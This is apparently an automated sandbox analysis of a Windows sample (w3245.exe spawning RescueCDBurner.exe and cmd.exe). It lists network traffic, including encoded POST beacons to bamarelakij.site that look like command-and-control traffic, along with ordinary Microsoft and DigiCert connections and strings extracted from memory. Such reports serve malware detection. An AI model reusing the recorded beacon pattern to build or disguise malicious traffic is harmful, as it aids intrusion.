Source: global trafficHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/Content-Length: 35Host: bamarelakij.site
Source: global trafficHTTP traffic detected: OPTIONS /api/report?cat=bingbusiness HTTP/1.1Host: bzib.nelreports.netConnection: keep-aliveOrigin: https://business.bing.comAccess-Control-Request-Method: POSTAccess-Control-Request-Headers: content-typeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: OPTIONS /api/report?cat=msn HTTP/1.1Host: deff.nelreports.netConnection: keep-aliveOrigin: https://assets.msn.comAccess-Control-Request-Method: POSTAccess-Control-Request-Headers: content-typeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: POST /api/report?cat=msn HTTP/1.1Host: deff.nelreports.netConnection: keep-aliveContent-Length: 1002Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: POST /api/report?cat=bingbusiness HTTP/1.1Host: bzib.nelreports.netConnection: keep-aliveContent-Length: 940Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: unknownTCP traffic detected without corresponding DNS query: 23.49.251.7
Source: unknownTCP traffic detected without corresponding DNS query: 23.49.251.7
Source: unknownTCP traffic detected without corresponding DNS query: 23.49.251.7
Source: unknownTCP traffic detected without corresponding DNS query: 23.49.251.7
Source: unknownTCP traffic detected without corresponding DNS query: 23.49.251.7
Source: unknownTCP traffic detected without corresponding DNS query: 23.49.251.7
Source: unknownTCP traffic detected without corresponding DNS query: 23.49.251.7
Source: unknownTCP traffic detected without corresponding DNS query: 23.49.251.7
Source: unknownTCP traffic detected without corresponding DNS query: 23.49.251.7
Source: unknownTCP traffic detected without corresponding DNS query: 23.49.251.7
Source: unknownTCP traffic detected without corresponding DNS query: 23.49.251.7
Source: unknownTCP traffic detected without corresponding DNS query: 23.49.251.7
Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknownTCP traffic detected without corresponding DNS query: 18.173.219.113
Source: unknownTCP traffic detected without corresponding DNS query: 18.173.219.113
Source: unknownTCP traffic detected without corresponding DNS query: 18.173.219.113
Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknownTCP traffic detected without corresponding DNS query: 18.173.219.113
Source: unknownTCP traffic detected without corresponding DNS query: 18.173.219.113
Source: unknownTCP traffic detected without corresponding DNS query: 18.173.219.113
Source: unknownTCP traffic detected without corresponding DNS query: 18.173.219.113
Source: unknownTCP traffic detected without corresponding DNS query: 18.173.219.113
Source: unknownTCP traffic detected without corresponding DNS query: 23.43.85.38
Source: unknownTCP traffic detected without corresponding DNS query: 23.43.85.38
Source: unknownTCP traffic detected without corresponding DNS query: 23.43.85.38
Source: unknownTCP traffic detected without corresponding DNS query: 23.43.85.38
Source: unknownTCP traffic detected without corresponding DNS query: 23.43.85.38
Source: unknownTCP traffic detected without corresponding DNS query: 23.43.85.38
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknownTCP traffic detected without corresponding DNS query: 23.43.85.38
Source: unknownTCP traffic detected without corresponding DNS query: 23.43.85.38
Source: unknownTCP traffic detected without corresponding DNS query: 23.43.85.38
Source: unknownTCP traffic detected without corresponding DNS query: 23.43.85.38
Source: unknownTCP traffic detected without corresponding DNS query: 23.43.85.38
Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /b?rn=1736201884775&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1B715D3435BD60832FC8485834156189&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /b2?rn=1736201884775&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1B715D3435BD60832FC8485834156189&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1E1e49df192553de02181e61736201885; XID=1E1e49df192553de02181e61736201885
Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1736201884774&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=21dedbcc40f24d988b676b18e5a4d184&activityId=21dedbcc40f24d988b676b18e5a4d184&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=09177A4F17534286BB4134B207DC161D&MUID=1B715D3435BD60832FC8485834156189 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=1B715D3435BD60832FC8485834156189; _EDGE_S=F=1&SID=01BF32393531614C25C1275534AA60B2; _EDGE_V=1; SM=T
Source: RescueCDBurner.exe, 00000002.00000002.1749055364.000000006C229000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: B!lQLocalSocketPrivate::completeAsyncReadQLocalSocketPrivate::startAsyncReadQLocalSocket::waitForReadyRead WaitForSingleObject failed with error code %d.\\.\pipe\QLocalSocket::connectToServer%1: %2QLocalServerPrivate::addListener1_q_onNewConnection()QLocalServerPrivate::_q_onNewConnectione-islem.kktcmerkezbankasi.org2148*.EGO.GOV.TR2087MD5 Collisions Inc. (http://www.phreedom.org/md5)41UTN-USERFirst-Hardware72:03:21:05:c5:0c:08:57:3d:8e:a5:30:4e:fe:e8:b0Digisign Server ID - (Enrich)1276011370Digisign Server ID (Enrich)12000170511846442971184640175DigiNotar Public CA 20251e:7d:7a:53:3d:45:30:41:96:40:0f:71:48:1f:45:04DigiNotar Extended Validation CAd6:d0:29:77:f1:49:fd:1a:83:f2:b9:ea:94:8c:5c:b4DigiNotar PKIoverheid CA Organisatie - G220001983DigiNotar PKIoverheid CA Overheid en Bedrijven20015536120000515120000505DigiNotar Cyber CA1200005251184640176DigiNotar Qualified CA5b:d5:60:9c:64:17:68:cf:21:0e:35:fd:fb:05:ad:41CertiID Enterprise Certificate Authoritya4:b6:ce:e3:2e:d3:35:46:26:3c:b3:55:3a:a8:92:21DigiNotar Root CA G20a:82:bd:1e:14:4e:88:14:d7:5b:1a:55:27:be:bf:3eDigiNotar Services 1024 CA36:16:71:55:43:42:1b:9d:e6:cb:a3:64:41:df:24:38DigiNotar Services CAf1:4a:13:f4:87:2b:56:dc:39:df:84:ca:7a:a1:06:49DigiNotar Root CA0c:76:da:9c:91:0c:4e:2c:9e:fe:15:d0:58:93:3c:4c*.google.com05:e2:e6:a4:cd:09:ea:54:d6:65:b0:75:fe:22:a2:56global trusteed8:f3:5f:4e:b7:87:2b:2d:ab:06:92:e3:15:38:2f:b0login.live.comb0:b7:13:3e:d0:96:f9:b5:6f:ae:91:c8:74:bd:3a:c0addons.mozilla.org92:39:d5:34:8f:40:d1:69:5a:74:54:70:e1:f2:3f:43login.skype.come9:02:8b:95:78:e4:15:dc:1a:71:0a:2b:88:15:44:473e:75:ce:d4:6b:69:30:21:21:88:30:ae:86:a8:2a:7139:2a:43:4f:0e:07:df:1f:8a:a3:05:de:34:e0:c2:29login.yahoo.comd7:55:8f:da:f5:f1:10:5b:b2:13:28:2b:70:77:29:a3www.google.comf5:c8:6a:f3:61:62:f1:3a:64:f5:4f:6d:c9:58:7c:06mail.google.com04:7e:cb:e9:fc:a5:5f:7b:d0:9e:ae:36:e1:0c:ae:1eSTOULCNOStateOrProvinceNameOrganizationalUnitNameLocalityNameCountryNameCommonNameOrganizationQMap(-----END CERTIFICATE----- equals www.yahoo.com (Yahoo)
Source: RescueCDBurner.exe, 00000003.00000002.1807438388.000000006B609000.00000002.00000001.01000000.00000013.sdmpString found in binary or memory: B_kQLocalSocketPrivate::completeAsyncReadQLocalSocketPrivate::startAsyncReadQLocalSocket::waitForReadyRead WaitForSingleObject failed with error code %d.\\.\pipe\QLocalSocket::connectToServer%1: %2QLocalServerPrivate::addListener1_q_onNewConnection()QLocalServerPrivate::_q_onNewConnectione-islem.kktcmerkezbankasi.org2148*.EGO.GOV.TR2087MD5 Collisions Inc. (http://www.phreedom.org/md5)41UTN-USERFirst-Hardware72:03:21:05:c5:0c:08:57:3d:8e:a5:30:4e:fe:e8:b0Digisign Server ID - (Enrich)1276011370Digisign Server ID (Enrich)12000170511846442971184640175DigiNotar Public CA 20251e:7d:7a:53:3d:45:30:41:96:40:0f:71:48:1f:45:04DigiNotar Extended Validation CAd6:d0:29:77:f1:49:fd:1a:83:f2:b9:ea:94:8c:5c:b4DigiNotar PKIoverheid CA Organisatie - G220001983DigiNotar PKIoverheid CA Overheid en Bedrijven20015536120000515120000505DigiNotar Cyber CA1200005251184640176DigiNotar Qualified CA5b:d5:60:9c:64:17:68:cf:21:0e:35:fd:fb:05:ad:41CertiID Enterprise Certificate Authoritya4:b6:ce:e3:2e:d3:35:46:26:3c:b3:55:3a:a8:92:21DigiNotar Root CA G20a:82:bd:1e:14:4e:88:14:d7:5b:1a:55:27:be:bf:3eDigiNotar Services 1024 CA36:16:71:55:43:42:1b:9d:e6:cb:a3:64:41:df:24:38DigiNotar Services CAf1:4a:13:f4:87:2b:56:dc:39:df:84:ca:7a:a1:06:49DigiNotar Root CA0c:76:da:9c:91:0c:4e:2c:9e:fe:15:d0:58:93:3c:4c*.google.com05:e2:e6:a4:cd:09:ea:54:d6:65:b0:75:fe:22:a2:56global trusteed8:f3:5f:4e:b7:87:2b:2d:ab:06:92:e3:15:38:2f:b0login.live.comb0:b7:13:3e:d0:96:f9:b5:6f:ae:91:c8:74:bd:3a:c0addons.mozilla.org92:39:d5:34:8f:40:d1:69:5a:74:54:70:e1:f2:3f:43login.skype.come9:02:8b:95:78:e4:15:dc:1a:71:0a:2b:88:15:44:473e:75:ce:d4:6b:69:30:21:21:88:30:ae:86:a8:2a:7139:2a:43:4f:0e:07:df:1f:8a:a3:05:de:34:e0:c2:29login.yahoo.comd7:55:8f:da:f5:f1:10:5b:b2:13:28:2b:70:77:29:a3www.google.comf5:c8:6a:f3:61:62:f1:3a:64:f5:4f:6d:c9:58:7c:06mail.google.com04:7e:cb:e9:fc:a5:5f:7b:d0:9e:ae:36:e1:0c:ae:1eSTOULCNOStateOrProvinceNameOrganizationalUnitNameLocalityNameCountryNameCommonNameOrganizationQMap(-----END CERTIFICATE----- equals www.yahoo.com (Yahoo)
Source: RescueCDBurner.exe, 0000000A.00000002.2074035845.000000006C179000.00000002.00000001.01000000.00000013.sdmpString found in binary or memory: lQLocalSocketPrivate::completeAsyncReadQLocalSocketPrivate::startAsyncReadQLocalSocket::waitForReadyRead WaitForSingleObject failed with error code %d.\\.\pipe\QLocalSocket::connectToServer%1: %2QLocalServerPrivate::addListener1_q_onNewConnection()QLocalServerPrivate::_q_onNewConnectione-islem.kktcmerkezbankasi.org2148*.EGO.GOV.TR2087MD5 Collisions Inc. (http://www.phreedom.org/md5)41UTN-USERFirst-Hardware72:03:21:05:c5:0c:08:57:3d:8e:a5:30:4e:fe:e8:b0Digisign Server ID - (Enrich)1276011370Digisign Server ID (Enrich)12000170511846442971184640175DigiNotar Public CA 20251e:7d:7a:53:3d:45:30:41:96:40:0f:71:48:1f:45:04DigiNotar Extended Validation CAd6:d0:29:77:f1:49:fd:1a:83:f2:b9:ea:94:8c:5c:b4DigiNotar PKIoverheid CA Organisatie - G220001983DigiNotar PKIoverheid CA Overheid en Bedrijven20015536120000515120000505DigiNotar Cyber CA1200005251184640176DigiNotar Qualified CA5b:d5:60:9c:64:17:68:cf:21:0e:35:fd:fb:05:ad:41CertiID Enterprise Certificate Authoritya4:b6:ce:e3:2e:d3:35:46:26:3c:b3:55:3a:a8:92:21DigiNotar Root CA G20a:82:bd:1e:14:4e:88:14:d7:5b:1a:55:27:be:bf:3eDigiNotar Services 1024 CA36:16:71:55:43:42:1b:9d:e6:cb:a3:64:41:df:24:38DigiNotar Services CAf1:4a:13:f4:87:2b:56:dc:39:df:84:ca:7a:a1:06:49DigiNotar Root CA0c:76:da:9c:91:0c:4e:2c:9e:fe:15:d0:58:93:3c:4c*.google.com05:e2:e6:a4:cd:09:ea:54:d6:65:b0:75:fe:22:a2:56global trusteed8:f3:5f:4e:b7:87:2b:2d:ab:06:92:e3:15:38:2f:b0login.live.comb0:b7:13:3e:d0:96:f9:b5:6f:ae:91:c8:74:bd:3a:c0addons.mozilla.org92:39:d5:34:8f:40:d1:69:5a:74:54:70:e1:f2:3f:43login.skype.come9:02:8b:95:78:e4:15:dc:1a:71:0a:2b:88:15:44:473e:75:ce:d4:6b:69:30:21:21:88:30:ae:86:a8:2a:7139:2a:43:4f:0e:07:df:1f:8a:a3:05:de:34:e0:c2:29login.yahoo.comd7:55:8f:da:f5:f1:10:5b:b2:13:28:2b:70:77:29:a3www.google.comf5:c8:6a:f3:61:62:f1:3a:64:f5:4f:6d:c9:58:7c:06mail.google.com04:7e:cb:e9:fc:a5:5f:7b:d0:9e:ae:36:e1:0c:ae:1eSTOULCNOStateOrProvinceNameOrganizationalUnitNameLocalityNameCountryNameCommonNameOrganizationQMap(-----END CERTIFICATE----- equals www.yahoo.com (Yahoo)
Source: global trafficDNS traffic detected: DNS query: bamarelakij.site
Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global trafficDNS traffic detected: DNS query: c.msn.com
Source: global trafficDNS traffic detected: DNS query: assets.msn.com
Source: global trafficDNS traffic detected: DNS query: api.msn.com
Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: unknownHTTP traffic detected: POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15Content-Length: 147Host: bamarelakij.site
Source: w3245.exeString found in binary or memory: http://appsyndication.org/2006/appsyn
Source: w3245.exe, 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp, w3245.exe, 00000000.00000000.1694764523.000000000094B000.00000002.00000001.01000000.00000003.sdmp, w3245.exe, 00000001.00000000.1701554751.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp, w3245.exe, 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: http://appsyndication.org/2006/appsynapplicationapuputil.cppupgradeexclusivetrueenclosuredigestalgor
Source: RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://b.chenall.net/menu.lst
Source: RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://bug.reneelab.com
Source: RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://bug.reneelab.com/psw_report.phpLicenseCodePSW_RENEELB_WINx86_20201003User
Source: RescueCDBurner.exe, 00000002.00000002.1749055364.000000006C229000.00000002.00000001.01000000.00000009.sdmp, RescueCDBurner.exe, 00000003.00000002.1807438388.000000006B609000.00000002.00000001.01000000.00000013.sdmp, RescueCDBurner.exe, 0000000A.00000002.2074035845.000000006C179000.00000002.00000001.01000000.00000013.sdmpString found in binary or memory: http://bugreports.qt-project.org/
Source: RescueCDBurner.exe, 00000002.00000002.1749055364.000000006C229000.00000002.00000001.01000000.00000009.sdmp, RescueCDBurner.exe, 00000003.00000002.1807438388.000000006B609000.00000002.00000001.01000000.00000013.sdmp, RescueCDBurner.exe, 0000000A.00000002.2074035845.000000006C179000.00000002.00000001.01000000.00000013.sdmpString found in binary or memory: http://bugreports.qt-project.org/QHttpNetworkConnectionChannel::_q_receiveReply()
Source: RescueCDBurner.exe, 00000002.00000002.1746995711.00000000097EA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805377766.0000000009BD8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2091623344.0000000005148000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 0000000A.00000002.2068057935.0000000009BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: RescueCDBurner.exe, 00000002.00000002.1746995711.00000000097EA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805377766.0000000009BD8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2091623344.0000000005148000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 0000000A.00000002.2068057935.0000000009BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: RescueCDBurner.exe, 00000002.00000002.1746995711.00000000097EA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805377766.0000000009BD8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2091623344.0000000005148000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 0000000A.00000002.2068057935.0000000009BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: RescueCDBurner.exe, 00000002.00000003.1731750258.0000000000E9A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: RescueCDBurner.exe, 00000002.00000003.1731750258.0000000000E9A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crt0
Source: RescueCDBurner.exe, 00000002.00000003.1731750258.0000000000E9A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
Source: RescueCDBurner.exe, 00000002.00000002.1746995711.00000000097EA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805377766.0000000009BD8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2091623344.0000000005148000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 0000000A.00000002.2068057935.0000000009BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: RescueCDBurner.exe, 00000002.00000003.1731750258.0000000000E9A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: RescueCDBurner.exe, 00000002.00000003.1731750258.0000000000E9A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: RescueCDBurner.exe, 00000002.00000002.1746995711.00000000097EA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805377766.0000000009BD8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2091623344.0000000005148000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 0000000A.00000002.2068057935.0000000009BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: RescueCDBurner.exe, 00000002.00000003.1731750258.0000000000E9A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: RescueCDBurner.exe, 00000002.00000002.1746995711.00000000097EA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805377766.0000000009BD8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2091623344.0000000005148000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 0000000A.00000002.2068057935.0000000009BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: RescueCDBurner.exe, 00000002.00000002.1746995711.00000000097EA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805377766.0000000009BD8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2091623344.0000000005148000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 0000000A.00000002.2068057935.0000000009BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: RescueCDBurner.exe, 00000002.00000003.1731750258.0000000000E9A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crl0N
Source: RescueCDBurner.exe, 00000002.00000003.1731750258.0000000000E9A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
Source: RescueCDBurner.exe, 00000002.00000003.1731750258.0000000000E9A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: RescueCDBurner.exe, 00000002.00000003.1731750258.0000000000E9A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: RescueCDBurner.exe, 00000002.00000002.1746995711.00000000097EA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805377766.0000000009BD8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2091623344.0000000005148000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 0000000A.00000002.2068057935.0000000009BDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
